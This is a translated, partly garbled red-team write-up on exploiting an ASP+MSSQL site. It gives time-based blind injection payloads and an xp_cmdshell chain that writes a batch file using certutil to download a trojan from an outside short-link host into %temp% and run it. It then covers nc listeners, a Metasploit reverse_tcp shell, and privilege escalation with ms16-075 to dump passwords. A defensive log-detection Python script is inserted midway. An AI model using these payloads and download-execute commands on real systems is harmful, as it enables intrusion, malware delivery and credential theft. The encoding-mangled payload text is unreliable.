
How ASP+MSSQL injection and command execution work

2025-02-27 Update From: SLTechnology News&Howtos

Shulou(Shulou.com)05/31 Report--

How do ASP+MSSQL injection and command execution actually work? Many newcomers are unclear about this, so the write-up below explains it in detail; anyone who needs it can learn from it, and we hope you gain something.

Preface

During an HW engagement there was a site with MSSQL injection and command-execution vulnerabilities, and exploiting them ran into some obstacles.

Process

First I gathered information and found a forum service open on a high port, so I opened the site for routine testing. Entering a single quote in the username field and in the search box produced an error, which very likely marks an injection point. Because I had not done ASP+MSSQL injection before, I consulted a more experienced colleague. The site passes its parameters via GET, but testing showed they can also be passed via POST (the ASP code presumably reads them with Request.Form). Boolean-based blind injection does not work, but stacked, time-based blind injection does, with a payload of the form '; if (db_name() like 'A%') waitfor delay '0:0:10'--. This can be tested with Burp Intruder: load a-z and 0-9 as the dictionary, enumerate, and judge each candidate by the response time. Here is an example.

When the enumeration reaches t, the response is delayed by 5 seconds, which proves that the first character of the database name is t. Then move the Intruder position to the next character, attach the dictionary again, adjust the thread count, and sort the results by response time.

The next character of the database name is e, and continuing this way yields the whole name. Next, determine whether the user has dba rights with '; if (select IS_SRVROLEMEMBER('sysadmin')) .... A payload that writes to >> %temp%/6.bat'-- comes to 61 characters, too long for the command to execute normally, so the payload has to be shortened: write the file without an extension and rename it with the copy command afterwards. The resulting payload is '; exec master..xp_cmdshell 'echo set quality %a%%b% >> %temp%/6'--, and the pieces are assembled into the complete payload.

@ echo off > >% temp%/3 certuti > >% temp%/3 l > >% temp%/3% a% b% > >% temp%/3 che > >% temp%/3% Q% a% > >% temp%/3 it ht > >% temp%/3% Q% a% > >% temp%/3 tp://suo > >% temp%/3% Q% a% > >% temp%/3 .im / 5UEW > >% temp%/3% Q% a% > >% temp%/3 Nn > >% temp%/3% Q%% a% > >% temp%/3%% temp%% > >% temp%/3% Q%% a% > >% temp%/3 / 1.exe > >% temp%/3% Q% a% > >% temp%/3% Q% > >% temp%/3copy% temp%\ 3% temp%\ 3.bat% temp%\ 3.bat% temp%\ 1.exe

The idea is to write the commands to a file, turn the extension-less file into a .bat with the copy command, and have the download command inside it fetch the trojan remotely into the chosen directory; the trojan is then started through command execution. Of course, you first have to confirm that the target has outbound network access, that the login is dba, and that xp_cmdshell is enabled.

xp_cmdshell ftp x.x.x.x

Run nc -lvvp 21 on the attacker's server; if a connection comes back, the target can execute commands and reach the internet. Then reproduce locally to check whether the command actually executes and whether it can write to the file. The command executed successfully but nothing was written to the file, so the ASP code was modified to display the SQL statement. Here is the code I reproduced locally.

It turned out that the % characters were not URL-encoded and vanished when the POST parameters were URL-decoded, so the payload was modified:

20@echo%20off > > 25temp%25/3%20setcertuti > > 25temp%25/3%20setl%20-urlca > > 25temp%25/3%20set%25a%25%25b%25 > > 25temp%25/3%20setche%20-spl > > 25temp%25/3%20set%25q%25%25a%25 > > 25temp%25/3%20setit%20-f%20ht > > 25temp%25/3%20set%25q%25%25a%25 > > 25temp%25/3%20settp://suo > > 25temp%25/3%20set 25q%25%25a%25 > > 25temp%25/3%20set.im/5UEW > > 25temp%25/3%20set%25q%25%25a%25 > 25temp%25/3%20setnn%20 > > 25temp%25/3%20set%25q%25%25a%25 > > 25temp%25/3%20set%25%25temp%25%25 > > 25temp%25/3%20set%25q%25%25a%25 > > 25temp%25/3%20set/1.exe > > 25temp%25/3%20set%25q%25%25a % 25 > >% 25temp%25/3%20%25q%25 > >% 25temp%25/3copy%20%25temp%25\ 3%20%25temp%25\ 3.bat%25temp%25\ 3.bat%25temp%25\ 1.exe
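Reading the probes above from the defender's side, the check that catches this pattern in web-server request logs is to URL-decode the POST body before matching: the +-encoded spaces hide waitfor delay from a pattern that expects whitespace, %3B hides the stacked ;, and the %25-encoded percent signs hide the %temp% expansion that only exists after the server decodes once. The Python below is an added example written for this page, not code from the write-up; the signature names, the sample request bodies, the response times and the 4.5 second threshold are all constructed for illustration.

```python
"""Log-side detection of stacked, time-based MSSQL injection probes and
xp_cmdshell use, matching on the URL-decoded POST body rather than the raw one.
Added example; signatures and sample data are constructed, not taken from a real log."""
import re
from urllib.parse import unquote_plus

# Request fragments named in the write-up, expressed as defensive signatures.
SIGNATURES = {
    "time_based_blind": re.compile(r"\bwaitfor\s+delay\b", re.I),
    "stacked_statement": re.compile(r";\s*(?:if|exec|execute)\b", re.I),
    "sysadmin_probe": re.compile(r"\bis_srvrolemember\s*\(", re.I),
    "os_command": re.compile(r"\bxp_cmdshell\b", re.I),
    # cmd.exe variable expansion such as %temp%; only visible after URL decoding
    "cmd_env_var": re.compile(r"%[A-Za-z_]\w*%"),
}

# Constructed threshold: the write-up's probes used a 5 second WAITFOR DELAY.
SLOW_RESPONSE_SECONDS = 4.5

# Constructed sample requests: raw POST body and response time in seconds.
SAMPLE_REQUESTS = [
    {"id": 1, "rt": 0.12, "body": "keyword=hello+world"},
    {"id": 2, "rt": 5.03,
     "body": "keyword=%27%3B+if+%28db_name%28%29+like+%27t%25%27%29"
             "+waitfor+delay+%270%3A0%3A5%27--"},
    {"id": 3, "rt": 4.98,
     "body": "keyword=%27%3B+if+%28select+IS_SRVROLEMEMBER%28%27sysadmin%27%29%29%3D1"
             "+waitfor+delay+%270%3A0%3A5%27--"},
    {"id": 4, "rt": 0.41,
     "body": "keyword=%27%3B+exec+master..xp_cmdshell+%27echo+set+%25a%25%25b%25"
             "+%3E%3E+%25temp%25%2F6%27--"},
]


def url_decode_until_stable(text, max_passes=3):
    """URL-decode repeatedly until the text stops changing.

    Returns (decoded_text, passes): passes is how many rounds altered the text,
    so a value of 2 or more means at least one layer of double encoding."""
    passes = 0
    for _ in range(max_passes):
        decoded = unquote_plus(text)
        if decoded == text:
            break
        text = decoded
        passes += 1
    return text, passes


def match_signatures(text):
    """Names of all signatures that fire on the given text, sorted for stable output."""
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(text))


def analyze_request(entry):
    """Score one request: what fires after decoding, what a raw-text match would have
    missed, and whether a delay probe coincided with a slow response."""
    raw_hits = match_signatures(entry["body"])
    decoded, passes = url_decode_until_stable(entry["body"])
    hits = match_signatures(decoded)
    slow = "time_based_blind" in hits and entry["rt"] >= SLOW_RESPONSE_SECONDS
    return {
        "id": entry["id"],
        "hits": hits,
        "missed_without_decoding": sorted(set(hits) - set(raw_hits)),
        "decode_passes": passes,
        "slow_response_with_delay_probe": slow,
    }


def analyze_all(entries):
    return [analyze_request(e) for e in entries]


if __name__ == "__main__":
    for result in analyze_all(SAMPLE_REQUESTS):
        print(result)
```

The missed_without_decoding field is the practical lesson: on the constructed samples, every signature except the literal xp_cmdshell token is invisible to a matcher that inspects the raw body, and the %temp% pattern appears only after the %25 layer is removed. Pairing the waitfor delay hit with the recorded response time turns a single suspicious request into a confirmed time-based probe.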

After execution, msf receives the shell. Checking with the tasklist command shows whether any antivirus processes are running, and since the local account's privileges were low, privilege escalation was needed before passwords could be grabbed.

Use post/multi/recon/local_exploit_suggester

msf's local_exploit_suggester matches the target against exploit modules that may be usable to escalate privileges on a vulnerable host. After that, ms16-075 was used to escalate locally, obtain SYSTEM privileges, and grab passwords.

Summary

Because I had no prior experience with asp+mssql, I was very clumsy when I first met this target, including on persistence and lateral movement: before I had time to do them, I had already been discovered. I had only used msf in my own virtual machine before, and that environment differs greatly from the real one. Moreover, the msf callback used reverse_tcp without rc4 or https to encrypt the traffic. As a result, the access lasted only 2 hours before the defenders noticed and shut down the website.
